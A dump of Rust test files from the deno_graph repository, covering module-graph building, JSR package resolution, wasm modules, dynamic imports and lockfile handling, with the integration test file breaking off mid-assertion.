format!("./tests/ecosystem/jsr_mirror/{scope}/{name}/{version}");
copy_dir_all(base_path, &tmpdir_path).unwrap();
for module in graph.modules() {
if module.specifier().scheme() != "file" {
continue;
}
if let Some(module) = module.js()
&& let Some(fcm) = module.fast_check_module()
{
let path =
format!("{}{}", tmpdir_path.display(), module.specifier.path());
std::fs::write(&path, fcm.source.as_bytes()).unwrap();
}
}
let tmpdir_path_str = tmpdir_path.to_string_lossy().to_string();
let tmpdir_specifier = Url::from_directory_path(&tmpdir_path).unwrap();
let tmpdir_specifier_path =
tmpdir_specifier.path().strip_suffix('/').unwrap();
let mut cmd = std::process::Command::new("deno");
cmd
.arg("check")
.arg(format!("--lock={}", lockfile_path.display()))
.arg("--no-config")
.env("DENO_NO_PACKAGE_JSON", "true")
.env("NO_COLOR", "true")
.env("RUST_LIB_BACKTRACE", "0")
.current_dir(&tmpdir_path);
if std::env::var("UPDATE_LOCKFILE").as_deref() == Ok("1") {
cmd.arg("--lock-write");
}
let deno_out = cmd
.args(roots.iter().map(|root| format!(".{}", root.path())))
.output()
.unwrap();
if deno_out.status.success() {
writeln!(&mut output, "\n== TYPE CHECK PASSED ==").unwrap();
} else {
writeln!(&mut output, "\n== TYPE CHECK FAILED ==").unwrap();
let initialize_regexp =
regex::Regex::new(r"(:?Initialize|Download|Check) [^\n]*\n").unwrap();
let node_modules_dir_regexp =
regex::Regex::new(r"([A-Z]:\/|\/)[^\s\n]*\/registry\.npmjs\.org")
.unwrap();
let stdout = String::from_utf8_lossy(&deno_out.stdout)
.replace(tmpdir_specifier_path, "<tmpdir>")
.replace(&tmpdir_path_str, "<tmpdir>")
.replace('\\', "/");
let stdout = initialize_regexp.replace_all(&stdout, "");
let stdout =
node_modules_dir_regexp.replace_all(&stdout, "<global_npm_dir>");
let stderr = String::from_utf8_lossy(&deno_out.stderr)
.replace(tmpdir_specifier_path, "<tmpdir>")
.replace(&tmpdir_path_str, "<tmpdir>")
.replace('\\', "/");
let stderr = initialize_regexp.replace_all(&stderr, "");
let stderr =
node_modules_dir_regexp.replace_all(&stderr, "<global_npm_dir>");
writeln!(&mut output, "-- stdout --\n{}", stdout).unwrap();
writeln!(&mut output, "-- stderr --\n{}", stderr).unwrap();
}
new_lockfile = std::fs::read_to_string(&lockfile_path).unwrap();
if !new_lockfile.ends_with('\n') {
new_lockfile.push('\n');
};
if std::env::var("DONT_CLEAN").is_ok() {
println!("leaving tempdir: {}", tmpdir_path.display());
Box::leak(Box::new(tmpdir));
} else {
std::fs::remove_file(lockfile_path).unwrap();
}
}
if std::env::var("UPDATE").as_deref() == Ok("1") {
std::fs::write(
spec_path,
format!(
"{scope}/{name}/{version}\n-- deno.lock --\n{}\n===\n\n{}",
new_lockfile, output
),
)
.unwrap();
} else {
let lockfile_expected = lockfile.trim_end();
let new_lockfile = new_lockfile.trim_end();
pretty_assertions::assert_eq!(
new_lockfile,
lockfile_expected,
"lockfile did not match, run `UPDATE=1 cargo test --test ecosystem` to update"
);
let expected = expected.trim_end();
let output = output.trim_end();
pretty_assertions::assert_eq!(output, expected);
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/tests/integration_test.rs | tests/integration_test.rs | // Copyright 2018-2024 the Deno authors. MIT license.
#![allow(clippy::disallowed_methods)]
// todo(dsherret): move the integration-like tests to this file because it
// helps ensure we're testing the public API and ensures we export types
// out of deno_graph that should be public
use std::cell::RefCell;
use deno_ast::ModuleSpecifier;
use deno_error::JsErrorBox;
use deno_graph::BuildOptions;
use deno_graph::FillFromLockfileOptions;
use deno_graph::GraphKind;
use deno_graph::ModuleGraph;
use deno_graph::NpmResolvePkgReqsResult;
use deno_graph::Range;
use deno_graph::packages::JsrPackageInfo;
use deno_graph::packages::JsrPackageInfoVersion;
use deno_graph::packages::JsrPackageVersionInfo;
use deno_graph::source::CacheSetting;
use deno_graph::source::ChecksumIntegrityError;
use deno_graph::source::LoadError;
use deno_graph::source::LoadFuture;
use deno_graph::source::LoadOptions;
use deno_graph::source::LoadResponse;
use deno_graph::source::MemoryLoader;
use deno_graph::source::NpmResolver;
use deno_graph::source::ResolutionKind;
use deno_graph::source::ResolveError;
use deno_semver::jsr::JsrDepPackageReq;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageReq;
use indexmap::IndexSet;
use pretty_assertions::assert_eq;
use serde_json::json;
use sys_traits::FsCreateDirAll;
use sys_traits::FsWrite;
use sys_traits::impls::InMemorySys;
use url::Url;
use crate::helpers::TestBuilder;
use self::helpers::TestNpmResolver;
mod helpers;
#[cfg(feature = "symbols")]
#[tokio::test]
async fn test_symbols_dep_definition() {
use deno_graph::symbols::ResolvedSymbolDepEntry;
let result = TestBuilder::new()
.with_loader(|loader| {
loader.remote.add_source_with_text(
"file:///mod.ts",
r#"
export type MyType = typeof MyClass;
export type MyTypeProp = typeof MyClass.staticProp;
export type MyTypeIndexAccess = typeof MyClass["staticProp"];
export type PrototypeAccess = typeof MyClass.prototype.instanceProp;
export class MyClass {
instanceProp: string = "";
static staticProp: string = "";
}
"#,
);
})
.build()
.await;
let root_symbol = result.root_symbol();
let module = root_symbol
.module_from_specifier(&ModuleSpecifier::parse("file:///mod.ts").unwrap())
.unwrap();
let exports = module.exports(&root_symbol);
let resolve_single_definition_text = |name: &str| -> String {
let resolved_type = exports.resolved.get(name).unwrap();
let resolved_type = resolved_type.as_resolved_export();
let type_symbol = resolved_type.symbol();
let deps = type_symbol
.decls()
.iter()
.filter_map(|d| d.maybe_node())
.flat_map(|s| {
s.deps(deno_graph::symbols::ResolveDepsMode::TypesAndExpressions)
})
.collect::<Vec<_>>();
assert_eq!(deps.len(), 1);
let mut resolved_deps =
root_symbol.resolve_symbol_dep(resolved_type.module, &deps[0]);
assert_eq!(resolved_deps.len(), 1);
let resolved_dep = resolved_deps.remove(0);
let path = match resolved_dep {
ResolvedSymbolDepEntry::Path(p) => p,
ResolvedSymbolDepEntry::ImportType(_) => unreachable!(),
};
let definitions = path.into_definitions().collect::<Vec<_>>();
assert_eq!(definitions.len(), 1);
let definition = &definitions[0];
definition.text().to_string()
};
let class_text = "export class MyClass {\n instanceProp: string = \"\";\n static staticProp: string = \"\";\n}";
assert_eq!(resolve_single_definition_text("MyType"), class_text);
assert_eq!(
resolve_single_definition_text("MyTypeProp"),
"static staticProp: string = \"\";"
);
assert_eq!(
resolve_single_definition_text("MyTypeIndexAccess"),
// good enough for now
class_text
);
assert_eq!(
resolve_single_definition_text("PrototypeAccess"),
// good enough for now
class_text
);
}
#[cfg(feature = "symbols")]
#[tokio::test]
async fn test_symbols_re_export_external_and_npm() {
let result = TestBuilder::new()
.with_loader(|loader| {
loader.remote.add_source_with_text(
"file:///mod.ts",
r#"export * from 'npm:example@1.0.0'; export * from 'external:other"#,
);
loader.remote.add_external_source("external:other");
})
.build()
.await;
let root_symbol = result.root_symbol();
let module = root_symbol
.module_from_specifier(&ModuleSpecifier::parse("file:///mod.ts").unwrap())
.unwrap();
let exports = module.exports(&root_symbol);
assert_eq!(
exports
.unresolved_specifiers
.into_iter()
.map(|s| s.specifier)
.collect::<Vec<_>>(),
vec!["npm:example@1.0.0", "external:other"]
);
}
#[tokio::test]
async fn test_jsr_version_not_found_then_found() {
#[derive(Default)]
struct TestLoader {
requests: RefCell<Vec<(String, CacheSetting)>>,
}
impl deno_graph::source::Loader for TestLoader {
fn load(
&self,
specifier: &ModuleSpecifier,
options: LoadOptions,
) -> LoadFuture {
assert!(!options.in_dynamic_branch);
self
.requests
.borrow_mut()
.push((specifier.to_string(), options.cache_setting));
let specifier = specifier.clone();
match specifier.as_str() {
"file:///main.ts" => Box::pin(async move {
Ok(Some(LoadResponse::Module {
specifier: specifier.clone(),
maybe_headers: None,
mtime: None,
content: b"import 'jsr:@scope/a@1.2".to_vec().into(),
}))
}),
"file:///empty.ts" => Box::pin(async move {
Ok(Some(LoadResponse::Module {
specifier: specifier.clone(),
maybe_headers: None,
mtime: None,
content: Default::default(),
}))
}),
"https://jsr.io/@scope/a/meta.json" => {
Box::pin(async move {
Ok(Some(LoadResponse::Module {
specifier: specifier.clone(),
maybe_headers: None,
mtime: None,
content: match options.cache_setting {
CacheSetting::Only | CacheSetting::Use => {
// first time it won't have the version
br#"{ "versions": { "1.0.0": {} } }"#.to_vec().into()
}
CacheSetting::Reload => {
// then on reload it will
br#"{ "versions": { "1.0.0": {}, "1.2.0": {} } }"#.to_vec().into()
}
},
}))
})
}
"https://jsr.io/@scope/a/1.2.0_meta.json" => Box::pin(async move {
Ok(Some(LoadResponse::Module {
specifier: specifier.clone(),
maybe_headers: None,
mtime: None,
content: br#"{
"exports": { ".": "./mod.ts" },
"manifest": {
"/mod.ts": {
"size": 123,
"checksum": "sha256-b8059cfb1ea623e79efbf432db31595df213c99c6534c58bec9d5f5e069344df"
}
}
}"#
.to_vec()
.into(),
}))
}),
"https://jsr.io/@scope/a/1.2.0/mod.ts" => Box::pin(async move {
Ok(Some(LoadResponse::Module {
specifier: specifier.clone(),
maybe_headers: None,
mtime: None,
content: b"console.log('Hello, world!')".to_vec().into(),
}))
}),
_ => unreachable!(),
}
}
}
{
let loader = TestLoader::default();
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![Url::parse("file:///main.ts").unwrap()],
Vec::new(),
&loader,
Default::default(),
)
.await;
graph.valid().unwrap();
assert_eq!(
*loader.requests.borrow(),
vec![
("file:///main.ts".to_string(), CacheSetting::Use),
(
"https://jsr.io/@scope/a/meta.json".to_string(),
CacheSetting::Use
),
("file:///main.ts".to_string(), CacheSetting::Use),
(
"https://jsr.io/@scope/a/meta.json".to_string(),
CacheSetting::Reload
),
(
"https://jsr.io/@scope/a/1.2.0_meta.json".to_string(),
CacheSetting::Reload
),
(
"https://jsr.io/@scope/a/1.2.0/mod.ts".to_string(),
CacheSetting::Use
),
]
);
}
{
let loader = TestLoader::default();
let mut graph = ModuleGraph::new(GraphKind::All);
// do an initial build
graph
.build(
vec![Url::parse("file:///empty.ts").unwrap()],
Vec::new(),
&loader,
Default::default(),
)
.await;
graph.valid().unwrap();
// full restart won't be supported at this point because
// a build previously happened, so it will only reload
// specific meta files
graph
.build(
vec![Url::parse("file:///main.ts").unwrap()],
Vec::new(),
&loader,
Default::default(),
)
.await;
graph.valid().unwrap();
assert_eq!(
*loader.requests.borrow(),
vec![
("file:///empty.ts".to_string(), CacheSetting::Use),
("file:///main.ts".to_string(), CacheSetting::Use),
(
"https://jsr.io/@scope/a/meta.json".to_string(),
CacheSetting::Use
),
(
"https://jsr.io/@scope/a/meta.json".to_string(),
CacheSetting::Reload
),
(
"https://jsr.io/@scope/a/1.2.0_meta.json".to_string(),
CacheSetting::Use
),
(
"https://jsr.io/@scope/a/1.2.0/mod.ts".to_string(),
CacheSetting::Use
),
]
);
}
}
#[tokio::test]
async fn test_jsr_wasm_module() {
struct TestLoader;
impl deno_graph::source::Loader for TestLoader {
fn load(
&self,
specifier: &ModuleSpecifier,
options: LoadOptions,
) -> LoadFuture {
assert!(!options.in_dynamic_branch);
let specifier = specifier.clone();
match specifier.as_str() {
"file:///main.ts" => Box::pin(async move {
Ok(Some(LoadResponse::Module {
specifier: specifier.clone(),
maybe_headers: None,
mtime: None,
content: b"import 'jsr:@scope/a@1".to_vec().into(),
}))
}),
"https://jsr.io/@scope/a/meta.json" => Box::pin(async move {
Ok(Some(LoadResponse::Module {
specifier: specifier.clone(),
maybe_headers: None,
mtime: None,
content: br#"{ "versions": { "1.0.0": {} } }"#.to_vec().into(),
}))
}),
"https://jsr.io/@scope/a/1.0.0_meta.json" => Box::pin(async move {
Ok(Some(LoadResponse::Module {
specifier: specifier.clone(),
maybe_headers: None,
mtime: None,
content: br#"{
"exports": { ".": "./math.wasm" },
"manifest": {
"/math.wasm": {
"size": 123,
"checksum": "sha256-b8059cfb1ea623e79efbf432db31595df213c99c6534c58bec9d5f5e069344df"
}
},
"moduleGraph2": {
"/math.wasm": {
"dependencies": []
}
}
}"#
.to_vec()
.into(),
}))
}),
"https://jsr.io/@scope/a/1.0.0/math.wasm" => Box::pin(async move {
if options.cache_setting == CacheSetting::Only {
Ok(None)
} else {
Ok(Some(LoadResponse::Module {
specifier: specifier.clone(),
maybe_headers: None,
mtime: None,
content: std::fs::read("./tests/testdata/math.wasm")
.unwrap()
.into(),
}))
}
}),
_ => unreachable!(),
}
}
}
{
let loader = TestLoader;
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![Url::parse("file:///main.ts").unwrap()],
Vec::new(),
&loader,
Default::default(),
)
.await;
graph.valid().unwrap();
}
}
#[tokio::test]
async fn test_checksum_error_force_refresh() {
#[derive(Default)]
struct TestLoader {
requests: RefCell<Vec<(String, CacheSetting)>>,
}
impl deno_graph::source::Loader for TestLoader {
fn load(
&self,
specifier: &ModuleSpecifier,
options: LoadOptions,
) -> LoadFuture {
self
.requests
.borrow_mut()
.push((specifier.to_string(), options.cache_setting));
let specifier = specifier.clone();
match specifier.as_str() {
"https://deno.land/mod.ts" => Box::pin(async move {
match options.cache_setting {
CacheSetting::Only => unreachable!(),
CacheSetting::Use => {
Err(LoadError::ChecksumIntegrity(ChecksumIntegrityError {
actual: "actual".to_string(),
expected: "expected".to_string(),
}))
}
CacheSetting::Reload => Ok(Some(LoadResponse::Module {
specifier: specifier.clone(),
maybe_headers: None,
mtime: None,
content: b"import './other.js';".to_vec().into(),
})),
}
}),
"https://deno.land/other.js" => Box::pin(async move {
match options.cache_setting {
CacheSetting::Only => unreachable!(),
CacheSetting::Use => {
Err(LoadError::ChecksumIntegrity(ChecksumIntegrityError {
actual: "actual".to_string(),
expected: "expected".to_string(),
}))
}
CacheSetting::Reload => Ok(Some(LoadResponse::Module {
specifier: specifier.clone(),
maybe_headers: None,
mtime: None,
content: b"console.log(1);".to_vec().into(),
})),
}
}),
_ => unreachable!(),
}
}
}
let loader = TestLoader::default();
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![Url::parse("https://deno.land/mod.ts").unwrap()],
Vec::new(),
&loader,
Default::default(),
)
.await;
graph.valid().unwrap();
assert_eq!(
*loader.requests.borrow(),
vec![
("https://deno.land/mod.ts".to_string(), CacheSetting::Use),
("https://deno.land/mod.ts".to_string(), CacheSetting::Reload),
("https://deno.land/other.js".to_string(), CacheSetting::Use),
(
"https://deno.land/other.js".to_string(),
CacheSetting::Reload
),
]
);
}
#[tokio::test]
async fn test_dynamic_imports_with_template_arg() {
async fn run_test(
code: &str,
files: Vec<(&str, &str)>,
expected_specifiers: Vec<&str>,
) {
let mut loader = MemoryLoader::default();
let sys = InMemorySys::default();
for (specifier, text) in &files {
let specifier = if cfg!(windows) {
specifier.replace("file:///", "file:///C:/")
} else {
specifier.to_string()
};
let specifier = ModuleSpecifier::parse(&specifier).unwrap();
let path = deno_path_util::url_to_file_path(&specifier).unwrap();
sys.fs_create_dir_all(path.parent().unwrap()).unwrap();
sys.fs_write(&path, text).unwrap();
loader.add_source_with_text(specifier, text);
}
let entrypoint = if cfg!(windows) {
"file:///C:/dev/main.ts"
} else {
"file:///dev/main.ts"
};
loader.add_source_with_text(entrypoint, code);
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![Url::parse(entrypoint).unwrap()],
Vec::new(),
&loader,
BuildOptions {
file_system: &sys,
..Default::default()
},
)
.await;
graph.valid().unwrap();
let specifiers = graph
.specifiers()
.map(|s| {
if cfg!(windows) {
s.0.as_str().replace("file:///C:/", "file:///")
} else {
s.0.to_string()
}
})
.filter(|s| s != "file:///dev/main.ts")
.collect::<Vec<_>>();
assert_eq!(specifiers, expected_specifiers);
}
// relative with ./
run_test(
"
await import(`./${test}`);
",
vec![
("file:///dev/a/mod.ts", ""),
("file:///dev/a/sub_dir/a.ts", ""),
("file:///dev/b.ts", ""),
],
vec![
"file:///dev/a/mod.ts",
"file:///dev/a/sub_dir/a.ts",
"file:///dev/b.ts",
],
)
.await;
// relative with sub dir
run_test(
"
await import(`./a/${test}`);
",
vec![
("file:///dev/a/mod.ts", ""),
("file:///dev/a/sub_dir/a.ts", ""),
("file:///dev/b.ts", ""),
],
vec!["file:///dev/a/mod.ts", "file:///dev/a/sub_dir/a.ts"],
)
.await;
run_test(
"
// should not match these two because it does not end in a slash
await import(`./b${test}`);
await import(`./c/a${test}`);
",
vec![
("file:///dev/a/mod.ts", ""),
("file:///dev/b.ts", ""),
("file:///dev/c/a.ts", ""),
("file:///dev/c/a/a.ts", ""),
],
vec![],
)
.await;
run_test(
"
await import(`./d/other/${test}/main.json`, {
with: {
type: 'json',
},
});
await import(`./d/sub/${test}`);
",
vec![
("file:///dev/d/a.ts", ""),
("file:///dev/d/sub/main.json", ""),
("file:///dev/d/sub/a.ts", ""),
("file:///dev/d/sub/a.js", ""),
("file:///dev/d/sub/a.mjs", ""),
("file:///dev/d/sub/a.mts", ""),
// should not match because it's a declaration file
("file:///dev/d/sub/a.d.ts", ""),
("file:///dev/d/other/json/main.json", ""),
("file:///dev/d/other/json/main2.json", ""),
],
vec![
"file:///dev/d/other/json/main.json",
"file:///dev/d/sub/a.js",
"file:///dev/d/sub/a.mjs",
"file:///dev/d/sub/a.mts",
"file:///dev/d/sub/a.ts",
],
)
.await;
// only matching one extension
run_test(
"
await import(`./d/sub2/${test}.mjs`);
",
vec![
("file:///dev/d/sub2/a.ts", ""),
("file:///dev/d/sub2/a.js", ""),
("file:///dev/d/sub2/a.mjs", ""),
("file:///dev/d/sub2/a.mts", ""),
],
vec!["file:///dev/d/sub2/a.mjs"],
)
.await;
// file specifiers
run_test(
if cfg!(windows) {
"await import(`file:///C:/dev/other/${test}`);"
} else {
"await import(`file:///dev/other/${test}`);"
},
vec![("file:///dev/other/mod.ts", ""), ("file:///dev/b.ts", "")],
vec!["file:///dev/other/mod.ts"],
)
.await;
// multiple exprs with same string between
run_test(
"await import(`./other/${test}/other/${test}/mod.ts`);",
vec![
("file:///dev/other/mod.ts", ""),
("file:///dev/other/other/mod.ts", ""),
("file:///dev/other/test/other/mod.ts", ""),
("file:///dev/other/test/other/test/mod.ts", ""),
("file:///dev/other/test/other/test/other/mod.ts", ""),
("file:///dev/b.ts", ""),
],
vec![
"file:///dev/other/test/other/test/mod.ts",
"file:///dev/other/test/other/test/other/mod.ts",
],
)
.await;
// finding itself
run_test(
"await import(`./${expr}`);",
vec![
("file:///dev/main.ts", ""), // self
("file:///dev/other.ts", ""),
],
// should not have "file:///dev/" here
vec!["file:///dev/other.ts"],
)
.await;
// root directory should be ignored because this is likely
// not wanted because it would include the entire file system
run_test(
"await import(`file:///${expr}`);",
vec![("file:///main.ts", ""), ("file:///dev/other.ts", "")],
vec![],
)
.await;
// won't search node_modules, vendor, or hidden folders
run_test(
"await import(`./${test}/mod.ts`);",
vec![
("file:///dev/other/.git/mod.ts", ""),
("file:///dev/other/node_modules/mod.ts", ""),
("file:///dev/other/sub_dir/mod.ts", ""),
("file:///dev/other/vendor/mod.ts", ""),
("file:///dev/other/mod.ts", ""),
],
vec![
"file:///dev/other/mod.ts",
"file:///dev/other/sub_dir/mod.ts",
],
)
.await;
}
#[tokio::test]
async fn test_fill_from_lockfile() {
let mut graph = ModuleGraph::new(GraphKind::All);
let redirects = [("https://example.com", "https://example.com/final")];
let specifiers = [
(
JsrDepPackageReq::from_str("jsr:@scope/example").unwrap(),
"1.0.0",
),
(
JsrDepPackageReq::from_str("jsr:@scope/example@1.0.1").unwrap(),
"1.0.1",
),
];
graph.fill_from_lockfile(FillFromLockfileOptions {
redirects: redirects.iter().copied(),
package_specifiers: specifiers.iter().map(|(k, v)| (k, *v)),
});
assert_eq!(
graph
.redirects
.get(&Url::parse("https://example.com").unwrap())
.unwrap()
.as_str(),
"https://example.com/final"
);
assert_eq!(
*graph
.packages
.mappings()
.get(&PackageReq::from_str("@scope/example").unwrap())
.unwrap(),
PackageNv::from_str("@scope/example@1.0.0").unwrap(),
);
let mut loader = MemoryLoader::default();
loader.add_jsr_package_info(
"@scope/example",
&JsrPackageInfo {
versions: vec![
(
deno_semver::Version::parse_standard("1.0.0").unwrap(),
JsrPackageInfoVersion::default(),
),
(
deno_semver::Version::parse_standard("1.0.1").unwrap(),
JsrPackageInfoVersion::default(),
),
]
.into_iter()
.collect(),
},
);
loader.add_jsr_version_info(
"@scope/example",
"1.0.0",
&JsrPackageVersionInfo {
exports: serde_json::json!({
".": "./mod.ts"
}),
..Default::default()
},
);
loader.add_jsr_version_info(
"@scope/example",
"1.0.1",
&JsrPackageVersionInfo {
exports: serde_json::json!({
".": "./mod.ts"
}),
..Default::default()
},
);
loader.add_source_with_text(
"https://jsr.io/@scope/example/1.0.0/mod.ts",
"// This is version 1.0.0 of this package.",
);
loader.add_source_with_text(
"https://jsr.io/@scope/example/1.0.1/mod.ts",
"// This is version 1.0.1 of this package.",
);
graph
.build(
// This will match 1.0.1 because it's the highest loaded matching
// version, even though this specifier is said as locking to 1.0.1
// in the lockfile
vec![Url::parse("jsr:/@scope/example").unwrap()],
Vec::new(),
&loader,
Default::default(),
)
.await;
graph.valid().unwrap();
let modules = graph.modules().collect::<Vec<_>>();
assert_eq!(modules.len(), 1);
let module = modules.into_iter().next().unwrap().js().unwrap();
assert_eq!(
module.source.text.as_ref(),
"// This is version 1.0.1 of this package."
);
// now it will be automatically updated to 1.0.1 instead of 1.0.0
assert_eq!(
*graph
.packages
.mappings()
.get(&PackageReq::from_str("@scope/example").unwrap())
.unwrap(),
PackageNv::from_str("@scope/example@1.0.1").unwrap(),
);
}
#[tokio::test]
async fn test_json_root() {
let mut graph = ModuleGraph::new(GraphKind::All);
let mut loader = MemoryLoader::default();
loader.add_source_with_text(
"https://jsr.io/@scope/example/1.0.0/data.json",
"{ \"a\": 1 }",
);
loader.add_source(
"https://deno.land/x/redirect",
deno_graph::source::Source::<_, [u8; 0]>::Redirect(
"https://jsr.io/@scope/example/1.0.0/data.json",
),
);
loader.add_source(
"https://deno.land/x/redirect2",
deno_graph::source::Source::<_, [u8; 0]>::Redirect(
"https://deno.land/x/redirect",
),
);
loader.add_source(
"https://deno.land/x/redirect3",
deno_graph::source::Source::<_, [u8; 0]>::Redirect(
"https://deno.land/x/redirect2",
),
);
loader.add_jsr_package_info(
"@scope/example",
&JsrPackageInfo {
versions: vec![(
deno_semver::Version::parse_standard("1.0.0").unwrap(),
JsrPackageInfoVersion::default(),
)]
.into_iter()
.collect(),
},
);
loader.add_jsr_version_info(
"@scope/example",
"1.0.0",
&JsrPackageVersionInfo {
exports: serde_json::json!({
"./json-export": "./data.json"
}),
..Default::default()
},
);
graph
.build(
vec![Url::parse("jsr:/@scope/example@^1.0.0/json-export").unwrap()],
Vec::new(),
&loader,
Default::default(),
)
.await;
graph.valid().unwrap();
graph
.build(
vec![Url::parse("https://deno.land/x/redirect").unwrap()],
Vec::new(),
&loader,
Default::default(),
)
.await;
graph.valid().unwrap();
graph
.build(
vec![Url::parse("https://deno.land/x/redirect3").unwrap()],
Vec::new(),
&loader,
Default::default(),
)
.await;
graph.valid().unwrap();
assert_eq!(
graph.roots.iter().map(|s| s.as_str()).collect::<Vec<_>>(),
vec![
"jsr:/@scope/example@^1.0.0/json-export",
"https://deno.land/x/redirect",
"https://deno.land/x/redirect3", // not 2
]
);
}
#[tokio::test]
async fn test_wasm_math() {
let mut graph = ModuleGraph::new(GraphKind::All);
let mut loader = MemoryLoader::default();
loader.add_bytes_source(
"file:///project/math.wasm",
std::fs::read("tests/testdata/math.wasm").unwrap(),
);
loader.add_source_with_text(
"file:///project/main.ts",
"import { add } from './math.wasm'; console.log(add(1, 2));",
);
graph
.build(
vec![Url::parse("file:///project/main.ts").unwrap()],
Vec::new(),
&loader,
Default::default(),
)
.await;
graph.valid().unwrap();
let wasm_module = graph
.get(&Url::parse("file:///project/math.wasm").unwrap())
.unwrap();
match wasm_module {
deno_graph::Module::Wasm(wasm_module) => {
assert_eq!(
wasm_module.source_dts.to_string(),
"export declare const memory: WebAssembly.Memory;
export declare function add(arg0: number, arg1: number): number;
export declare function subtract(arg0: number, arg1: number): number;
export declare const __data_end: number;
export declare const __heap_base: number;
"
);
}
_ => unreachable!(),
}
}
#[tokio::test]
async fn test_wasm_math_with_import() {
let mut graph = ModuleGraph::new(GraphKind::All);
let mut loader = MemoryLoader::default();
loader.add_bytes_source(
"file:///project/math.wasm",
std::fs::read("tests/testdata/math_with_import.wasm").unwrap(),
);
loader.add_source_with_text(
"file:///project/main.ts",
"import { add } from './math.wasm'; console.log(add(1, 2));",
);
loader.add_source_with_text(
"file:///project/math.ts",
"export function add(a: number, b: number): number { return a + b; }\n export function subtract(a: number, b: number): number { return a - b; }",
);
graph
.build(
vec![Url::parse("file:///project/main.ts").unwrap()],
Vec::new(),
&loader,
Default::default(),
)
.await;
graph.valid().unwrap();
let wasm_module = graph
.get(&Url::parse("file:///project/math.wasm").unwrap())
.unwrap();
match wasm_module {
deno_graph::Module::Wasm(wasm_module) => {
assert_eq!(
wasm_module.source_dts.to_string(),
"import { \"js_add\" as __deno_wasm_import_0__, \"js_subtract\" as __deno_wasm_import_1__ } from \"./math.ts\";
export declare const memory: WebAssembly.Memory;
export declare function add(arg0: number, arg1: number): number;
export declare function subtract(arg0: number, arg1: number): number;
export declare const __data_end: number;
export declare const __heap_base: number;
"
);
}
_ => unreachable!(),
}
// now ensure the imports are in the graph
assert!(
graph
.get(&Url::parse("file:///project/math.ts").unwrap())
.is_some()
);
}
#[tokio::test]
async fn test_prune() {
let mut graph = ModuleGraph::new(GraphKind::All);
let mut loader = MemoryLoader::default();
loader.add_source_with_text(
"file:///project/mod.ts",
r#"
import type { Types } from "./types.ts";
import { Code } from "./code.ts";
function test() {
await import("./dynamic.ts");
}
await import("https://example.com/main.ts");
"#,
);
loader.add_source_with_text("file:///project/types.ts", "");
loader.add_source_with_text("file:///project/code.ts", "");
loader.add_source_with_text("https:///example.com/main.ts", "");
loader.add_source_with_text(
"file:///project/dynamic.ts",
"function test() { import ('npm:chalk@1.0.0'); }",
);
graph
.build(
vec![Url::parse("file:///project/mod.ts").unwrap()],
Vec::new(),
&loader,
BuildOptions {
npm_resolver: Some(&TestNpmResolver),
..Default::default()
},
)
.await;
graph.valid().unwrap();
graph.prune_types();
assert_eq!(graph.graph_kind(), GraphKind::CodeOnly);
assert_eq!(
graph.npm_packages,
IndexSet::from([PackageNv::from_str("chalk@1.0.0").unwrap()])
);
assert_eq!(
json!(graph),
json!({
"roots": ["file:///project/mod.ts"],
"modules": [
{
"kind": "esm",
"size": 0,
"mediaType": "TypeScript",
"specifier": "file:///project/code.ts"
},
{
"kind": "esm",
"dependencies": [{
"specifier": "npm:chalk@1.0.0",
"code": {
"specifier": "npm:chalk@1.0.0",
"resolutionMode": "import",
"span": {
"start": { "line": 0, "character": 26 },
"end": { "line": 0, "character": 43 },
}
},
"isDynamic": true
}],
"size": 47,
"mediaType": "TypeScript",
"specifier": "file:///project/dynamic.ts",
},
{
"kind": "esm",
"dependencies": [
{ "specifier": "./types.ts" },
{
"specifier": "./code.ts",
"code": {
"specifier": "file:///project/code.ts",
"resolutionMode": "import",
"span": {
"start": { "line": 2, "character": 21 },
"end": { "line": 2, "character": 32 }
}
}
},
{
"specifier": "./dynamic.ts",
"code": {
"specifier": "file:///project/dynamic.ts",
"resolutionMode": "import",
"span": {
"start": { "line": 5, "character": 15 },
"end": { "line": 5, "character": 29 }
}
},
"isDynamic": true,
},
{
"specifier": "https://example.com/main.ts",
"code": {
"specifier": "https://example.com/main.ts",
"resolutionMode": "import",
"span": {
"start": { "line": 8, "character": 13 },
"end": { "line": 8, "character": 42 }
}
},
"isDynamic": true
},
],
"size": 175,
"mediaType": "TypeScript",
"specifier": "file:///project/mod.ts"
},
{
"kind": "esm",
"size": 0,
"mediaType": "TypeScript",
"specifier": "https://example.com/main.ts",
},
{
"kind": "npm",
"specifier": "npm:/chalk@1.0.0"
}
],
"redirects": {
"npm:chalk@1.0.0": "npm:/chalk@1.0.0"
}
})
);
}
#[tokio::test]
async fn test_reload() {
let mut graph = ModuleGraph::new(GraphKind::All);
let mut loader = MemoryLoader::default();
loader.add_source_with_text("file:///project/mod.ts", r#"import "./a.ts";"#);
loader.add_source_with_text("file:///project/a.ts", "");
graph
.build(
vec![Url::parse("file:///project/mod.ts").unwrap()],
Vec::new(),
&loader,
BuildOptions {
npm_resolver: Some(&TestNpmResolver),
..Default::default()
},
)
.await;
loader.add_source_with_text("file:///project/a.ts", "await import('./b.ts')");
loader
.add_source_with_text("file:///project/b.ts", "import 'npm:chalk@1.0.0';");
graph
.reload(
vec![Url::parse("file:///project/a.ts").unwrap()],
&loader,
BuildOptions {
npm_resolver: Some(&TestNpmResolver),
..Default::default()
},
)
.await;
graph.valid().unwrap();
assert_eq!(
graph.npm_packages,
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/tests/specs_test.rs | tests/specs_test.rs | // Copyright 2018-2024 the Deno authors. MIT license.
#![allow(clippy::disallowed_methods)]
use std::borrow::Cow;
use std::cell::OnceCell;
use std::collections::BTreeMap;
use std::panic::AssertUnwindSafe;
use std::collections::HashMap;
use std::fmt::Write;
use std::path::Path;
use std::path::PathBuf;
use std::rc::Rc;
use deno_ast::EmitOptions;
use deno_ast::EmittedSourceText;
use deno_ast::SourceMap;
use deno_ast::diagnostics::Diagnostic;
use deno_ast::emit;
use deno_graph::WorkspaceMember;
